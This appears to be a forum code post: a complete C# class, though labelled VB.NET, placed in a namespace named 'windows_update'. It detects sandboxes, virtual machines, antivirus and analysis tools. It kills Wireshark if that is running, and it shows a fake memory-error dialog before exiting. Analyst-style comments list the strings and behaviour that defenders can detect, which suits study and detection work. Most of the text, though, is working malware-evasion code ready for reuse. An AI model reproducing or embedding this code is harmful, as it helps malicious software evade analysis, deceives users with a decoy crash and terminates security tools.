Title: (VB.NET)AntiDebug
کد:
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
using System.Windows.Forms;
using Microsoft.Win32;

namespace windows_update
{
    // Collection of environment-fingerprinting checks. Each private Anti* method
    // returns true when it finds one specific artifact (a running process name,
    // a directory, a user name, a registry value, a timing anomaly); CheckDebug
    // runs them in sequence and calls Detected() on the first hit.
    //
    // Analyst notes: every indicator is a hard-coded string literal in this
    // class (process names, "C:\\analysis", "currentuser", "\\sample.exe", the
    // ProductId value and the decoy error text), so the class can be recognised
    // statically from its strings. At run time it shows up as repeated
    // process-list enumeration, a read of the Windows NT CurrentVersion
    // registry key, and possibly termination of another process.
    internal class AntiDebug
    {
        // Entry point. Evaluates the checks in the fixed order below as an
        // else-if chain: the first check that returns true triggers Detected()
        // and the remaining checks are not evaluated. If none returns true the
        // method returns normally with no side effect of its own.
        public static void CheckDebug()
        {
            if (AntiVirtualPC())
                Detected();
            else if (AntiAnubis())
                Detected();
            else if (AntiAnubis2())
                Detected();
            else if (AntiKAV())
                Detected();
            else if (AntiSandboxie())
                Detected();
            else if (AntiEmulator())
                Detected();
            else if (AntiNorman())
                Detected();
            else if (AntiWireShark())
                Detected();
            else if (AntiVirtualBox())
                Detected();
            else if (AntiSunbelt())
                Detected();
        }

        // Reaction to a positive check: shows a modal error dialog and then
        // terminates the process with exit code 0.
        // The dialog text and both addresses are hard-coded literals, not taken
        // from any real fault, so the "Application Error" is a decoy. The exact
        // message and the "Critical Error!" caption are stable strings that can
        // serve as static or UI-level indicators.
        private static void Detected()
        {
            MessageBox.Show(
                "Application Error: The instruction at \"0x78ec83b4\" referenced memory at \"0x00405467\". The memory could not be \"read\".",
                "Critical Error!", MessageBoxButtons.OK, MessageBoxIcon.Error);
            Environment.Exit(0);
        }

        // Returns true when prcIsRunning reports a process named "VBoxService".
        // NOTE(review): presumably targets the VirtualBox guest service - confirm.
        private static bool AntiVirtualBox()
        {
            if (prcIsRunning("VBoxService"))
                return true;
            else
                return false;
        }

        // Returns true when the directory C:\analysis exists.
        // NOTE(review): the method name suggests this path is associated with
        // the Sunbelt sandbox; the code itself only tests for the directory.
        private static bool AntiSunbelt()
        {
            if (Directory.Exists("C:\\analysis"))
                return true;
            else
                return false;
        }

        // Looks for a process via prcIsRunning("wireshark.exe"); on a match it
        // calls killProcess with the same name and returns true.
        // This is the only check in the class that acts on another process
        // rather than just observing: a positive result terminates the capture
        // tool before Detected() runs, which is visible in process-termination
        // telemetry.
        private static bool AntiWireShark()
        {
            if (prcIsRunning("wireshark.exe"))
            {
                killProcess("wireshark.exe");
                return true;
            }
            else
                return false;
        }

        // Returns true when the current user name is exactly "currentuser"
        // (case-sensitive string comparison).
        // NOTE(review): the method name suggests this is the account name used
        // by the Norman sandbox; the code only compares the string.
        private static bool AntiNorman()
        {
            if (Environment.UserName == "currentuser")
                return true;
            else
                return false;
        }

        //Credit: ChainCoder
        // Timing check: samples Environment.TickCount, sleeps 500 ms, samples
        // again, and returns true when the tick-count difference is below 500,
        // i.e. when the requested sleep did not advance the tick counter by the
        // full interval. Always costs about half a second of wall time when the
        // sleep is honoured, which is itself an observable start-up delay.
        private static bool AntiEmulator()
        {
            bool functionReturnValue = false;
            long timenow = 0;
            long timeaftersleep = 0;
            //Assign long timenow to get the milliseconds passed before app being suspended.

            //Tickcount before sleep
            timenow = Environment.TickCount;
            //Sleeps half a second
            Thread.Sleep(500);
            //Tickcount after sleep
            timeaftersleep = Environment.TickCount;

            if (timeaftersleep - timenow < 500)
                functionReturnValue = true;
            else
                functionReturnValue = false;

            return functionReturnValue;
        }

        // Returns true when at least one process named "SbieSvc", "sniff_hit"
        // or "sysAnalyzer" is running. Despite the method name, only the first
        // name refers to Sandboxie; the other two are presumably analysis tools
        // (TODO confirm). The conditions are joined with the non-short-circuit
        // '|' operator, so all three process lookups are always performed.
        private static bool AntiSandboxie()
        {
            if (Process.GetProcessesByName("SbieSvc").Length >= 1 | Process.GetProcessesByName("sniff_hit").Length >= 1 |
                Process.GetProcessesByName("sysAnalyzer").Length >= 1)
                return true;
            else
                return false;
        }

        // Returns true when at least one process named "avp" is running.
        // NOTE(review): presumably the Kaspersky Anti-Virus process, going by
        // the method name - confirm.
        private static bool AntiKAV()
        {
            if (Process.GetProcessesByName("avp").Length >= 1)
                return true;
            else
                return false;
        }

        // Builds <startup folder>\sample.exe and returns true when that string
        // equals Application.ExecutablePath, i.e. when the running file is
        // named "sample.exe" (case-sensitive comparison).
        // NOTE(review): the method name suggests this is the file name the
        // Anubis sandbox gave submitted samples; the code only checks the name.
        private static bool AntiAnubis()
        {
            string folder = Application.StartupPath;
            string getFile = folder + "\\sample.exe";
            if (Application.ExecutablePath == getFile)
                return true;
            else
                return false;
        }

        // Reads the "ProductId" value under
        // HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion (key opened
        // read-only) and returns true when it equals the hard-coded ID below.
        // Only the product ID is compared; the MACHINEGUID listed in the
        // comment is not referenced anywhere in the code.
        private static bool AntiAnubis2()
        {
            //Anubis Info -
            //PRODUCT ID/KEY: 76487-337-8429955-22614
            //MACHINEGUID: e575b6fd-1714-411e-8f6a-4c469796e816

            // Second argument 'false' requests a non-writable handle.
            RegistryKey regPID = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
                                                                  false);
            object pid = regPID.GetValue("ProductId");
            string id = "76487-337-8429955-22614";

            if ((string) pid == id)
                return true;
            else
                return false;
        }

        // Returns true when there are at least four processes named "vpcmap"
        // AND at least four named "vmsrvc" (both lookups always run because of
        // the non-short-circuit '&'), or at least four named "vmusrvc".
        // NOTE(review): presumably Virtual PC guest components, going by the
        // method name - confirm.
        private static bool AntiVirtualPC()
        {
            if (Process.GetProcessesByName("vpcmap").Length >= 4 & Process.GetProcessesByName("vmsrvc").Length >= 4)
            {
                return true;
            }
            else if (Process.GetProcessesByName("vmusrvc").Length >= 4)
            {
                return true;
            }
            return false;
        }

        // Helper: enumerates every process on the machine and returns true as
        // soon as one has a ProcessName equal to the argument (case-sensitive
        // string equality). Public, so it is callable from outside this class.
        public static bool prcIsRunning(string process)
        {
            foreach (Process p in Process.GetProcesses())
                if (p.ProcessName == process)
                    return true;
            return false;
        }

        // Helper: enumerates every process on the machine and calls Kill() on
        // each one whose ProcessName equals the argument. There is no
        // confirmation, filtering by owner, or error handling around Kill().
        // Public, so it is callable from outside this class.
        public static void killProcess(string process)
        {
            foreach (Process p in Process.GetProcesses())
                if (p.ProcessName.Equals(process))
                    p.Kill();
        }
    }
}